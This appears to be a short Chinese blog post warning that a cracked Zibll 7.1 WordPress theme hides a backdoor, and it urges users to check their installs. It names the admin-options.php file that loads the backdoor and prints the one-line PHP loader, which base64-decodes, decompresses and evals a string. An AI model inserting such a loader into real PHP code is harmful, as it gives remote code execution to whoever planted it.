后门分析及排查路径已在该帖发布
![图片[1]-子比7.1破解版后门文件-可能资源网](https://www.kngzs.cn/wp-content/uploads/2023/06/e3132a69d4122701-1024x547.jpg)
在使用的请注意排查,如果实在想用请找官方包自行开心修改。
![图片[2]-子比7.1破解版后门文件-可能资源网](https://www.kngzs.cn/wp-content/uploads/2023/06/8a67130201122801-300x154.jpg)
后门原理分析:
/zibpay/functions/admin/admin-options.php调用支付插件文件夹里的PHP后门
![图片[3]-子比7.1破解版后门文件-可能资源网](https://www.kngzs.cn/wp-content/uploads/2023/06/59544c9b90122832-300x157.jpg)
<?php $info= $www=base64_decode($info);$https=gzinflate($www); @eval($https); ?>将一个base64编码过的字符串进行解码和解压缩,并执行其中的代码。
也就是说后门作者可以直接远程访问js.php(或者其它名字的),然后他就可以为所欲为了。
THE END
